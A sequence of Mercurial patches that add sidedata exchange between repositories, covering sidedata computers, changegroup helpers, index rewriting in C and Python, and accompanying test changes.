@@ -1832,6 +1832,12 @@ def savecommitmessage(text): pass + def register_sidedata_computer(kind, category, keys, computer): + pass + + def register_wanted_sidedata(category): + pass + class completelocalrepository( ilocalrepositorymain, ilocalrepositoryfilestorage diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -49,6 +49,7 @@ match as matchmod, mergestate as mergestatemod, mergeutil, + metadata as metadatamod, namespaces, narrowspec, obsolete, @@ -273,6 +274,11 @@ caps = moderncaps.copy() self._repo = repo.filtered(b'served') self.ui = repo.ui + + if repo._wanted_sidedata: + formatted = bundle2.format_remote_wanted_sidedata(repo) + caps.add(b'exp-wanted-sidedata=' + formatted) + self._caps = repo._restrictcapabilities(caps) # Begin of _basepeer interface. 
@@ -1395,6 +1401,10 @@ if requirementsmod.COPIESSDC_REQUIREMENT in self.requirements: self.filecopiesmode = b'changeset-sidedata' + self._wanted_sidedata = set() + self._sidedata_computers = {} + metadatamod.set_sidedata_spec_for_repo(self) + def _getvfsward(self, origfunc): """build a ward for self.vfs""" rref = weakref.ref(self) @@ -3332,6 +3342,22 @@ fp.close() return self.pathto(fp.name[len(self.root) + 1 :]) + def register_wanted_sidedata(self, category): + self._wanted_sidedata.add(pycompat.bytestr(category)) + + def register_sidedata_computer(self, kind, category, keys, computer): + if kind not in (b"changelog", b"manifest", b"filelog"): + msg = _(b"unexpected revlog kind '%s'.") + raise error.ProgrammingError(msg % kind) + category = pycompat.bytestr(category) + if category in self._sidedata_computers.get(kind, []): + msg = _( + b"cannot register a sidedata computer twice for category '%s'." + ) + raise error.ProgrammingError(msg % category) + self._sidedata_computers.setdefault(kind, {}) + self._sidedata_computers[kind][category] = (keys, computer) + # used to avoid circular references so destructors work def aftertrans(files): diff --git a/mercurial/metadata.py b/mercurial/metadata.py --- a/mercurial/metadata.py +++ b/mercurial/metadata.py @@ -18,6 +18,7 @@ from . 
import ( error, pycompat, + requirements as requirementsmod, util, ) @@ -804,6 +805,21 @@ return encode_files_sidedata(files), files.has_copies_info +def copies_sidedata_computer(repo, revlog, rev, existing_sidedata): + return _getsidedata(repo, rev)[0] + + +def set_sidedata_spec_for_repo(repo): + if requirementsmod.COPIESSDC_REQUIREMENT in repo.requirements: + repo.register_wanted_sidedata(sidedatamod.SD_FILES) + repo.register_sidedata_computer( + b"changelog", + sidedatamod.SD_FILES, + (sidedatamod.SD_FILES,), + copies_sidedata_computer, + ) + + def getsidedataadder(srcrepo, destrepo): use_w = srcrepo.ui.configbool(b'experimental', b'worker.repository-upgrade') if pycompat.iswindows or not use_w: diff --git a/mercurial/statichttprepo.py b/mercurial/statichttprepo.py --- a/mercurial/statichttprepo.py +++ b/mercurial/statichttprepo.py @@ -172,6 +172,7 @@ self.names = namespaces.namespaces() self.filtername = None self._extrafilterid = None + self._wanted_sidedata = set() try: requirements = set(self.vfs.read(b'requires').splitlines()) diff --git a/tests/test-check-interfaces.py b/tests/test-check-interfaces.py --- a/tests/test-check-interfaces.py +++ b/tests/test-check-interfaces.py @@ -85,6 +85,7 @@ class dummyrepo(object): def __init__(self): self.ui = uimod.ui() + self._wanted_sidedata = set() def filtered(self, name): pass # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1615401198 -3600 # Wed Mar 10 19:33:18 2021 +0100 # Node ID f63299ee7e4d9bc817dac2edeae7725766dbd0cc # Parent bc2519513ae06df0107b5cbacafbd8b8d1b4fc6c revlog: add attribute on revlogs that specifies its kind The sidedata logic needs to check whether the revlog it's working on is a changelog, a manifest or a filelog. Furthermore, future versions of the revlog format will most likely see a split between the three types (i.e. they will store different information), so having this will be useful for other future endeavors as well. 
Differential Revision: https://phab.mercurial-scm.org/D10151 diff --git a/mercurial/changelog.py b/mercurial/changelog.py --- a/mercurial/changelog.py +++ b/mercurial/changelog.py @@ -428,6 +428,7 @@ self._filteredrevs = frozenset() self._filteredrevs_hashcache = {} self._copiesstorage = opener.options.get(b'copies-storage') + self.revlog_kind = b'changelog' @property def filteredrevs(self): diff --git a/mercurial/filelog.py b/mercurial/filelog.py --- a/mercurial/filelog.py +++ b/mercurial/filelog.py @@ -32,6 +32,7 @@ # Full name of the user visible file, relative to the repository root. # Used by LFS. self._revlog.filename = path + self._revlog.revlog_kind = b'filelog' def __len__(self): return len(self._revlog) diff --git a/mercurial/manifest.py b/mercurial/manifest.py --- a/mercurial/manifest.py +++ b/mercurial/manifest.py @@ -1610,6 +1610,7 @@ self.index = self._revlog.index self.version = self._revlog.version self._generaldelta = self._revlog._generaldelta + self._revlog.revlog_kind = b'manifest' def _setupmanifestcachehooks(self, repo): """Persist the manifestfulltextcache on lock release""" # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1613729742 -3600 # Fri Feb 19 11:15:42 2021 +0100 # Node ID 45f0d52976983e5fb7434c0d4630bbed0c34401b # Parent f63299ee7e4d9bc817dac2edeae7725766dbd0cc changegroupv4: add sidedata helpers These helpers carry the information and computers needed to rewrite sidedata when generating/applying patches. We will be making use of them soon. 
Differential Revision: https://phab.mercurial-scm.org/D10029 diff --git a/hgext/sqlitestore.py b/hgext/sqlitestore.py --- a/hgext/sqlitestore.py +++ b/hgext/sqlitestore.py @@ -587,6 +587,7 @@ revisiondata=False, assumehaveparentrevisions=False, deltamode=repository.CG_DELTAMODE_STD, + sidedata_helpers=None, ): if nodesorder not in (b'nodes', b'storage', b'linear', None): raise error.ProgrammingError( @@ -625,6 +626,7 @@ revisiondata=revisiondata, assumehaveparentrevisions=assumehaveparentrevisions, deltamode=deltamode, + sidedata_helpers=sidedata_helpers, ): yield delta diff --git a/mercurial/changegroup.py b/mercurial/changegroup.py --- a/mercurial/changegroup.py +++ b/mercurial/changegroup.py @@ -272,6 +272,7 @@ url, targetphase=phases.draft, expectedtotal=None, + sidedata_categories=None, ): """Add the changegroup returned by source.read() to this repo. srctype is a string like 'push', 'pull', or 'unbundle'. url is @@ -282,9 +283,23 @@ - more heads than before: 1+added heads (2..n) - fewer heads than before: -1-removed heads (-2..-n) - number of heads stays the same: 1 + + `sidedata_categories` is an optional set of the remote's sidedata wanted + categories. """ repo = repo.unfiltered() + # Only useful if we're adding sidedata categories. If both peers have + # the same categories, then we simply don't do anything. + if self.version == b'04' and srctype == b'pull': + sidedata_helpers = get_sidedata_helpers( + repo, + sidedata_categories or set(), + pull=True, + ) + else: + sidedata_helpers = None + def csmap(x): repo.ui.debug(b"add changeset %s\n" % short(x)) return len(cl) @@ -749,6 +764,7 @@ clrevtolocalrev=None, fullclnodes=None, precomputedellipsis=None, + sidedata_helpers=None, ): """Calculate deltas for a set of revisions. @@ -756,6 +772,8 @@ If topic is not None, progress detail will be generated using this topic name (e.g. changesets, manifests, etc). + + See `storageutil.emitrevisions` for the doc on `sidedata_helpers`. 
""" if not nodes: return @@ -854,6 +872,7 @@ revisiondata=True, assumehaveparentrevisions=not ellipses, deltamode=deltamode, + sidedata_helpers=sidedata_helpers, ) for i, revision in enumerate(revisions): @@ -974,8 +993,21 @@ self._verbosenote(_(b'uncompressed size of bundle content:\n')) size = 0 + sidedata_helpers = None + if self.version == b'04': + remote_sidedata = self._remote_sidedata + if source == b'strip': + # We're our own remote when stripping, get the no-op helpers + # TODO a better approach would be for the strip bundle to + # correctly advertise its sidedata categories directly. + remote_sidedata = repo._wanted_sidedata + sidedata_helpers = get_sidedata_helpers(repo, remote_sidedata) + clstate, deltas = self._generatechangelog( - cl, clnodes, generate=changelog + cl, + clnodes, + generate=changelog, + sidedata_helpers=sidedata_helpers, ) for delta in deltas: for chunk in _revisiondeltatochunks(delta, self._builddeltaheader): @@ -1023,6 +1055,7 @@ fnodes, source, clstate[b'clrevtomanifestrev'], + sidedata_helpers=sidedata_helpers, ) for tree, deltas in it: @@ -1063,6 +1096,7 @@ fastpathlinkrev, fnodes, clrevs, + sidedata_helpers=sidedata_helpers, ) for path, deltas in it: @@ -1087,7 +1121,9 @@ if clnodes: repo.hook(b'outgoing', node=hex(clnodes[0]), source=source) - def _generatechangelog(self, cl, nodes, generate=True): + def _generatechangelog( + self, cl, nodes, generate=True, sidedata_helpers=None + ): """Generate data for changelog chunks. Returns a 2-tuple of a dict containing state and an iterable of @@ -1096,6 +1132,8 @@ if generate is False, the state will be fully populated and no chunk stream will be yielded + + See `storageutil.emitrevisions` for the doc on `sidedata_helpers`. 
""" clrevorder = {} manifests = {} @@ -1179,6 +1217,7 @@ clrevtolocalrev={}, fullclnodes=self._fullclnodes, precomputedellipsis=self._precomputedellipsis, + sidedata_helpers=sidedata_helpers, ) return state, gen @@ -1192,11 +1231,14 @@ fnodes, source, clrevtolocalrev, + sidedata_helpers=None, ): """Returns an iterator of changegroup chunks containing manifests. `source` is unused here, but is used by extensions like remotefilelog to change what is sent based in pulls vs pushes, etc. + + See `storageutil.emitrevisions` for the doc on `sidedata_helpers`. """ repo = self._repo mfl = repo.manifestlog @@ -1285,6 +1327,7 @@ clrevtolocalrev=clrevtolocalrev, fullclnodes=self._fullclnodes, precomputedellipsis=self._precomputedellipsis, + sidedata_helpers=sidedata_helpers, ) if not self._oldmatcher.visitdir(store.tree[:-1]): @@ -1323,6 +1366,7 @@ fastpathlinkrev, fnodes, clrevs, + sidedata_helpers=None, ): changedfiles = [ f @@ -1417,6 +1461,7 @@ clrevtolocalrev=clrevtolocalrev, fullclnodes=self._fullclnodes, precomputedellipsis=self._precomputedellipsis, + sidedata_helpers=sidedata_helpers, ) yield fname, deltas @@ -1792,3 +1837,25 @@ ) return revisions, files + + +def get_sidedata_helpers(repo, remote_sd_categories, pull=False): + # Computers for computing sidedata on-the-fly + sd_computers = collections.defaultdict(list) + # Computers for categories to remove from sidedata + sd_removers = collections.defaultdict(list) + + to_generate = remote_sd_categories - repo._wanted_sidedata + to_remove = repo._wanted_sidedata - remote_sd_categories + if pull: + to_generate, to_remove = to_remove, to_generate + + for revlog_kind, computers in repo._sidedata_computers.items(): + for category, computer in computers.items(): + if category in to_generate: + sd_computers[revlog_kind].append(computer) + if category in to_remove: + sd_removers[revlog_kind].append(computer) + + sidedata_helpers = (repo, sd_computers, sd_removers) + return sidedata_helpers diff --git a/mercurial/filelog.py 
b/mercurial/filelog.py --- a/mercurial/filelog.py +++ b/mercurial/filelog.py @@ -103,6 +103,7 @@ revisiondata=False, assumehaveparentrevisions=False, deltamode=repository.CG_DELTAMODE_STD, + sidedata_helpers=None, ): return self._revlog.emitrevisions( nodes, @@ -110,6 +111,7 @@ revisiondata=revisiondata, assumehaveparentrevisions=assumehaveparentrevisions, deltamode=deltamode, + sidedata_helpers=sidedata_helpers, ) def addrevision( diff --git a/mercurial/manifest.py b/mercurial/manifest.py --- a/mercurial/manifest.py +++ b/mercurial/manifest.py @@ -1826,6 +1826,7 @@ revisiondata=False, assumehaveparentrevisions=False, deltamode=repository.CG_DELTAMODE_STD, + sidedata_helpers=None, ): return self._revlog.emitrevisions( nodes, @@ -1833,6 +1834,7 @@ revisiondata=revisiondata, assumehaveparentrevisions=assumehaveparentrevisions, deltamode=deltamode, + sidedata_helpers=sidedata_helpers, ) def addgroup( diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -2733,6 +2733,7 @@ revisiondata=False, assumehaveparentrevisions=False, deltamode=repository.CG_DELTAMODE_STD, + sidedata_helpers=None, ): if nodesorder not in (b'nodes', b'storage', b'linear', None): raise error.ProgrammingError( @@ -2761,6 +2762,7 @@ deltamode=deltamode, revisiondata=revisiondata, assumehaveparentrevisions=assumehaveparentrevisions, + sidedata_helpers=sidedata_helpers, ) DELTAREUSEALWAYS = b'always' diff --git a/mercurial/utils/storageutil.py b/mercurial/utils/storageutil.py --- a/mercurial/utils/storageutil.py +++ b/mercurial/utils/storageutil.py @@ -23,6 +23,7 @@ pycompat, ) from ..interfaces import repository +from ..revlogutils import sidedata as sidedatamod from ..utils import hashutil _nullhash = hashutil.sha1(nullid) @@ -294,6 +295,7 @@ deltamode=repository.CG_DELTAMODE_STD, revisiondata=False, assumehaveparentrevisions=False, + sidedata_helpers=None, ): """Generic implementation of ifiledata.emitrevisions(). 
@@ -356,6 +358,21 @@ ``nodesorder`` ``revisiondata`` ``assumehaveparentrevisions`` + ``sidedata_helpers`` (optional) + If not None, means that sidedata should be included. + A dictionary of revlog type to tuples of `(repo, computers, removers)`: + * `repo` is used as an argument for computers + * `computers` is a list of `(category, (keys, computer))` that + compute the missing sidedata categories that were asked: + * `category` is the sidedata category + * `keys` are the sidedata keys to be affected + * `computer` is the function `(repo, store, rev, sidedata)` that + returns a new sidedata dict. + * `removers` will remove the keys corresponding to the categories + that are present, but not needed. + If both `computers` and `removers` are empty, sidedata are simply not + transformed. + Revlog types are `changelog`, `manifest` or `filelog`. @@ -469,6 +486,17 @@ available.add(rev) + sidedata = None + if sidedata_helpers: + sidedata = store.sidedata(rev) + sidedata = run_sidedata_helpers( + store=store, + sidedata_helpers=sidedata_helpers, + sidedata=sidedata, + rev=rev, + ) + sidedata = sidedatamod.serialize_sidedata(sidedata) + yield resultcls( node=node, p1node=fnode(p1rev), @@ -484,6 +512,25 @@ prevrev = rev + +def run_sidedata_helpers(store, sidedata_helpers, sidedata, rev): + """Returns the sidedata for the given revision after running through + the given helpers. 
+ - `store`: the revlog this applies to (changelog, manifest, or filelog + instance) + - `sidedata_helpers`: see `storageutil.emitrevisions` + - `sidedata`: previous sidedata at the given rev, if any + - `rev`: affected rev of `store` + """ + repo, sd_computers, sd_removers = sidedata_helpers + kind = store.revlog_kind + for _keys, sd_computer in sd_computers.get(kind, []): + sidedata = sd_computer(repo, store, rev, sidedata) + for keys, _computer in sd_removers.get(kind, []): + for key in keys: + sidedata.pop(key, None) + return sidedata + + def deltaiscensored(delta, baserev, baselenfn): """Determine if a delta represents censored revision data. diff --git a/tests/simplestorerepo.py b/tests/simplestorerepo.py --- a/tests/simplestorerepo.py +++ b/tests/simplestorerepo.py @@ -446,6 +446,7 @@ revisiondata=False, assumehaveparentrevisions=False, deltamode=repository.CG_DELTAMODE_STD, + sidedata_helpers=None, ): # TODO this will probably break on some ordering options. nodes = [n for n in nodes if n != nullid] @@ -459,6 +460,7 @@ revisiondata=revisiondata, assumehaveparentrevisions=assumehaveparentrevisions, deltamode=deltamode, + sidedata_helpers=sidedata_helpers, ): yield delta # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1613729057 -3600 # Fri Feb 19 11:04:17 2021 +0100 # Node ID c8bb7b89179e8d0dc437fb04f94be8659a8cd7f3 # Parent 45f0d52976983e5fb7434c0d4630bbed0c34401b revlogv2: temporarily forbid inline revlogs See inline comments. I plan to fix the underlying issue before revlogv2 is stabilized. Differential Revision: https://phab.mercurial-scm.org/D10030 diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -639,7 +639,11 @@ % (flags >> 16, fmt, self.indexfile) ) - self._inline = versionflags & FLAG_INLINE_DATA + # There is a bug in the transaction handling when going from an + # inline revlog to a separate index and data file. 
Turn it off until + # it's fixed, since v2 revlogs sometimes get rewritten on exchange. + # See issue6485 + self._inline = False # generaldelta implied by version 2 revlogs. self._generaldelta = True # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1613383708 -3600 # Mon Feb 15 11:08:28 2021 +0100 # Node ID 502e795b55acdb9926e8a2daa9e1c64827e35ac0 # Parent c8bb7b89179e8d0dc437fb04f94be8659a8cd7f3 revlog-index: add `replace_sidedata_info` method During a `pull` operation where the server does not provide sidedata, the client that requires it should generate them on-the-fly. In the generic case, we need to wait for the changelog + manifests + filelogs to be added, since we don't know what the sidedata computers might need: this means rewriting the sidedata of index entries from within the pull transaction (and no further back) right after we've added them. Both Python and C implementations only allow for rewriting the sidedata offset and length for revs within the transaction where they were created. Differential Revision: https://phab.mercurial-scm.org/D10031 diff --git a/mercurial/cext/revlog.c b/mercurial/cext/revlog.c --- a/mercurial/cext/revlog.c +++ b/mercurial/cext/revlog.c @@ -458,6 +458,56 @@ Py_RETURN_NONE; } +/* Replace an existing index entry's sidedata offset and length with new ones. + This cannot be used outside of the context of sidedata rewriting, + inside the transaction that creates the given revision. */ +static PyObject *index_replace_sidedata_info(indexObject *self, PyObject *args) +{ + uint64_t sidedata_offset; + int rev; + Py_ssize_t sidedata_comp_len; + char *data; + #if LONG_MAX == 0x7fffffffL + const char *const sidedata_format = PY23("nKi", "nKi"); + #else + const char *const sidedata_format = PY23("nki", "nki"); + #endif + + if (self->hdrsize == v1_hdrsize || self->inlined) { + /* + There is a bug in the transaction handling when going from an + inline revlog to a separate index and data file. 
Turn it off until + it's fixed, since v2 revlogs sometimes get rewritten on exchange. + See issue6485. + */ + raise_revlog_error(); + return NULL; + } + + if (!PyArg_ParseTuple(args, sidedata_format, &rev, &sidedata_offset, + &sidedata_comp_len)) + return NULL; + + if (rev < 0 || rev >= index_length(self)) { + PyErr_SetString(PyExc_IndexError, "revision outside index"); + return NULL; + } + if (rev < self->length) { + PyErr_SetString( + PyExc_IndexError, + "cannot rewrite entries outside of this transaction"); + return NULL; + } + + /* Find the newly added node, offset from the "already on-disk" length */ + data = self->added + self->hdrsize * (rev - self->length); + putbe64(sidedata_offset, data + 64); + putbe32(sidedata_comp_len, data + 72); + + + Py_RETURN_NONE; +} + static PyObject *index_stats(indexObject *self) { PyObject *obj = PyDict_New(); @@ -2789,6 +2839,8 @@ "compute phases"}, {"reachableroots2", (PyCFunction)reachableroots2, METH_VARARGS, "reachableroots"}, + {"replace_sidedata_info", (PyCFunction)index_replace_sidedata_info, + METH_VARARGS, "replace an existing index entry with a new value"}, {"headrevs", (PyCFunction)index_headrevs, METH_VARARGS, "get head revisions"}, /* Can do filtering since 3.2 */ {"headrevsfiltered", (PyCFunction)index_headrevs, METH_VARARGS, diff --git a/mercurial/pure/parsers.py b/mercurial/pure/parsers.py --- a/mercurial/pure/parsers.py +++ b/mercurial/pure/parsers.py @@ -259,6 +259,27 @@ assert index_size == 96, index_size null_item = (0, 0, 0, -1, -1, -1, -1, nullid, 0, 0) + def replace_sidedata_info(self, i, sidedata_offset, sidedata_length): + """ + Replace an existing index entry's sidedata offset and length with new + ones. + This cannot be used outside of the context of sidedata rewriting, + inside the transaction that creates the revision `i`. 
+ """ + if i < 0: + raise KeyError + self._check_index(i) + sidedata_format = b">Qi" + packed_size = struct.calcsize(sidedata_format) + if i >= self._lgt: + packed = _pack(sidedata_format, sidedata_offset, sidedata_length) + old = self._extra[i - self._lgt] + new = old[:64] + packed + old[64 + packed_size :] + self._extra[i - self._lgt] = new + else: + msg = b"cannot rewrite entries outside of this transaction" + raise KeyError(msg) + class IndexObject2(Index2Mixin, IndexObject): pass # HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1613730290 -3600 # Fri Feb 19 11:24:50 2021 +0100 # Node ID ba8e508a8e69284b70c857c616a299887770ef83 # Parent 502e795b55acdb9926e8a2daa9e1c64827e35ac0 sidedata-exchange: rewrite sidedata on-the-fly whenever possible When a A exchanges with B, the difference of their supported sidedata categories is made, and the responsibility is always with the client to generated it: - If A pushes to B and B requires category `foo` that A does not have, A will need to generate it when sending it to B. - If A pulls from B and A needs category `foo`, it will generate `foo` before the end of the transaction. - Any category that is not required is removed. If peers are not compatible, abort. It is forbidden to rewrite sidedata for a rev that already has sidedata, since that would introduce unreachable (garbage) data in the data file, something we're not prepared for yet. 
Differential Revision: https://phab.mercurial-scm.org/D10032 diff --git a/mercurial/changegroup.py b/mercurial/changegroup.py --- a/mercurial/changegroup.py +++ b/mercurial/changegroup.py @@ -7,6 +7,7 @@ from __future__ import absolute_import +import collections import os import struct import weakref @@ -252,7 +253,7 @@ pos = next yield closechunk() - def _unpackmanifests(self, repo, revmap, trp, prog): + def _unpackmanifests(self, repo, revmap, trp, prog, addrevisioncb=None): self.callback = prog.increment # no need to check for empty manifest group here: # if the result of the merge of 1 and 2 is the same in 3 and 4, @@ -260,7 +261,8 @@ # be empty during the pull self.manifestheader() deltas = self.deltaiter() - repo.manifestlog.getstorage(b'').addgroup(deltas, revmap, trp) + storage = repo.manifestlog.getstorage(b'') + storage.addgroup(deltas, revmap, trp, addrevisioncb=addrevisioncb) prog.complete() self.callback = None @@ -369,6 +371,13 @@ efilesset = None self.callback = None + # Keep track of the (non-changelog) revlogs we've updated and their + # range of new revisions for sidedata rewrite. + # TODO do something more efficient than keeping the reference to + # the revlogs, especially memory-wise. 
+ touched_manifests = {} + touched_filelogs = {} + # pull off the manifest group repo.ui.status(_(b"adding manifests\n")) # We know that we'll never have more manifests than we had @@ -376,7 +385,24 @@ progress = repo.ui.makeprogress( _(b'manifests'), unit=_(b'chunks'), total=changesets ) - self._unpackmanifests(repo, revmap, trp, progress) + on_manifest_rev = None + if sidedata_helpers and b'manifest' in sidedata_helpers[1]: + + def on_manifest_rev(manifest, rev): + range = touched_manifests.get(manifest) + if not range: + touched_manifests[manifest] = (rev, rev) + else: + assert rev == range[1] + 1 + touched_manifests[manifest] = (range[0], rev) + + self._unpackmanifests( + repo, + revmap, + trp, + progress, + addrevisioncb=on_manifest_rev, + ) needfiles = {} if repo.ui.configbool(b'server', b'validate'): @@ -390,12 +416,37 @@ for f, n in pycompat.iteritems(mfest): needfiles.setdefault(f, set()).add(n) + on_filelog_rev = None + if sidedata_helpers and b'filelog' in sidedata_helpers[1]: + + def on_filelog_rev(filelog, rev): + range = touched_filelogs.get(filelog) + if not range: + touched_filelogs[filelog] = (rev, rev) + else: + assert rev == range[1] + 1 + touched_filelogs[filelog] = (range[0], rev) + # process the files repo.ui.status(_(b"adding file changes\n")) newrevs, newfiles = _addchangegroupfiles( - repo, self, revmap, trp, efiles, needfiles + repo, + self, + revmap, + trp, + efiles, + needfiles, + addrevisioncb=on_filelog_rev, ) + if sidedata_helpers: + if b'changelog' in sidedata_helpers[1]: + cl.rewrite_sidedata(sidedata_helpers, clstart, clend - 1) + for mf, (startrev, endrev) in touched_manifests.items(): + mf.rewrite_sidedata(sidedata_helpers, startrev, endrev) + for fl, (startrev, endrev) in touched_filelogs.items(): + fl.rewrite_sidedata(sidedata_helpers, startrev, endrev) + # making sure the value exists tr.changes.setdefault(b'changegroup-count-changesets', 0) tr.changes.setdefault(b'changegroup-count-revisions', 0) @@ -559,14 +610,18 @@ node, 
p1, p2, deltabase, cs, flags = headertuple return node, p1, p2, deltabase, cs, flags - def _unpackmanifests(self, repo, revmap, trp, prog): - super(cg3unpacker, self)._unpackmanifests(repo, revmap, trp, prog) + def _unpackmanifests(self, repo, revmap, trp, prog, addrevisioncb=None): + super(cg3unpacker, self)._unpackmanifests( + repo, revmap, trp, prog, addrevisioncb=addrevisioncb + ) for chunkdata in iter(self.filelogheader, {}): # If we get here, there are directory manifests in the changegroup d = chunkdata[b"filename"] repo.ui.debug(b"adding %s revisions\n" % d) deltas = self.deltaiter() - if not repo.manifestlog.getstorage(d).addgroup(deltas, revmap, trp): + if not repo.manifestlog.getstorage(d).addgroup( + deltas, revmap, trp, addrevisioncb=addrevisioncb + ): raise error.Abort(_(b"received dir revlog group is empty")) @@ -1793,7 +1848,15 @@ return bundler.generate(commonrevs, csets, fastpathlinkrev, source) -def _addchangegroupfiles(repo, source, revmap, trp, expectedfiles, needfiles): +def _addchangegroupfiles( + repo, + source, + revmap, + trp, + expectedfiles, + needfiles, + addrevisioncb=None, +): revisions = 0 files = 0 progress = repo.ui.makeprogress( @@ -1808,7 +1871,13 @@ o = len(fl) try: deltas = source.deltaiter() - if not fl.addgroup(deltas, revmap, trp): + added = fl.addgroup( + deltas, + revmap, + trp, + addrevisioncb=addrevisioncb, + ) + if not added: raise error.Abort(_(b"received file revlog group is empty")) except error.CensoredBaseError as e: raise error.Abort(_(b"received delta base is censored: %s") % e) diff --git a/mercurial/revlog.py b/mercurial/revlog.py --- a/mercurial/revlog.py +++ b/mercurial/revlog.py @@ -3205,3 +3205,54 @@ ) return d + + def rewrite_sidedata(self, helpers, startrev, endrev): + if self.version & 0xFFFF != REVLOGV2: + return + # inline are not yet supported because they suffer from an issue when + # rewriting them (since it's not an append-only operation). + # See issue6485. 
+ assert not self._inline + if not helpers[1] and not helpers[2]: + # Nothing to generate or remove + return + + new_entries = [] + # append the new sidedata + with self._datafp(b'a+') as fp: + # Maybe this bug still exists, see revlog._writeentry + fp.seek(0, os.SEEK_END) + current_offset = fp.tell() + for rev in range(startrev, endrev + 1): + entry = self.index[rev] + new_sidedata = storageutil.run_sidedata_helpers( + store=self, + sidedata_helpers=helpers, + sidedata={}, + rev=rev, + ) + + serialized_sidedata = sidedatautil.serialize_sidedata( + new_sidedata + ) + if entry[8] != 0 or entry[9] != 0: + # rewriting entries that already have sidedata is not + # supported yet, because it introduces garbage data in the + # revlog. + msg = "Rewriting existing sidedata is not supported yet" + raise error.Abort(msg) + entry = entry[:8] + entry += (current_offset, len(serialized_sidedata)) + + fp.write(serialized_sidedata) + new_entries.append(entry) + current_offset += len(serialized_sidedata) + + # rewrite the new index entries + with self._indexfp(b'w+') as fp: + fp.seek(startrev * self._io.size) + for i, entry in enumerate(new_entries): + rev = startrev + i + self.index.replace_sidedata_info(rev, entry[8], entry[9]) + packed = self._io.packentry(entry, self.node, self.version, rev) + fp.write(packed) diff --git a/tests/test-copies-in-changeset.t b/tests/test-copies-in-changeset.t --- a/tests/test-copies-in-changeset.t +++ b/tests/test-copies-in-changeset.t @@ -271,13 +271,12 @@ $ hg ci --amend -m 'copy a to j, v2' saved backup bundle to $TESTTMP/repo/.hg/strip-backup/*-*-amend.hg (glob) $ hg debugsidedata -c -v -- -1 - 1 sidedata entries (missing-correct-output !) - entry-0014 size 24 (missing-correct-output !) - '\x00\x00\x00\x02\x00\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00aj' (missing-correct-output !) 
+ 1 sidedata entries + entry-0014 size 24 + '\x00\x00\x00\x02\x00\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00aj' #endif $ hg showcopies --config experimental.copies.read-from=filelog-only - a -> j (sidedata missing-correct-output !) - a -> j (no-sidedata !) + a -> j The entries should be written to extras even if they're empty (so the client won't have to fall back to reading from filelogs) $ echo x >> j @@ -355,8 +354,7 @@ saved backup bundle to $TESTTMP/rebase-rename/.hg/strip-backup/*-*-rebase.hg (glob) $ hg st --change . --copies A b - a (sidedata missing-correct-output !) - a (no-sidedata !) + a R a $ cd .. diff --git a/tests/test-sidedata-exchange.t b/tests/test-sidedata-exchange.t new file mode 100644 --- /dev/null +++ b/tests/test-sidedata-exchange.t @@ -0,0 +1,473 @@ +=========================== +Tests for sidedata exchange +=========================== + +Check simple exchange behavior +============================== + +Pusher and pushed have sidedata enabled +--------------------------------------- + + $ hg init sidedata-source --config format.exp-use-side-data=yes + $ cat << EOF >> sidedata-source/.hg/hgrc + > [extensions] + > testsidedata=$TESTDIR/testlib/ext-sidedata-5.py + > EOF + $ hg init sidedata-target --config format.exp-use-side-data=yes + $ cat << EOF >> sidedata-target/.hg/hgrc + > [extensions] + > testsidedata=$TESTDIR/testlib/ext-sidedata-5.py + > EOF + $ cd sidedata-source + $ echo a > a + $ echo b > b + $ echo c > c + $ hg commit -Am "initial" + adding a + adding b + adding c + $ echo aa > a + $ hg commit -m "other" + $ hg push -r . 
../sidedata-target + pushing to ../sidedata-target + searching for changes + adding changesets + adding manifests + adding file changes + added 2 changesets with 4 changes to 3 files + $ hg -R ../sidedata-target debugsidedata -c 0 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg -R ../sidedata-target debugsidedata -c 1 -v + 2 sidedata entries + entry-0001 size 4 + '\x00\x00\x00:' + entry-0002 size 32 + '\xa3\xee4v\x99\x85$\x9f\x1f\x8dKe\x0f\xc3\x9d-\xc9\xb5%[\x15=h\xe9\xf2O\xb5\xd9\x1f*\xff\xe5' + $ hg -R ../sidedata-target debugsidedata -m 0 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg -R ../sidedata-target debugsidedata -m 1 -v + 2 sidedata entries + entry-0001 size 4 + '\x00\x00\x00\x81' + entry-0002 size 32 + '-bL\xc5\xa4uu"#\xac\x1b`,\xc0\xbc\x9d\xf5\xac\xf0\x1d\x89)2\xf8N\xb1\x14m\xce\xd7\xbc\xae' + $ hg -R ../sidedata-target debugsidedata a 0 + 2 sidedata entries + entry-0001 size 4 + entry-0002 size 32 + $ hg -R ../sidedata-target debugsidedata a 1 -v + 2 sidedata entries + entry-0001 size 4 + '\x00\x00\x00\x03' + entry-0002 size 32 + '\xd9\xcd\x81UvL5C\xf1\x0f\xad\x8aH\rt17Fo\x8dU!<\x8e\xae\xfc\xd1/\x06\xd4:\x80' + $ cd .. 
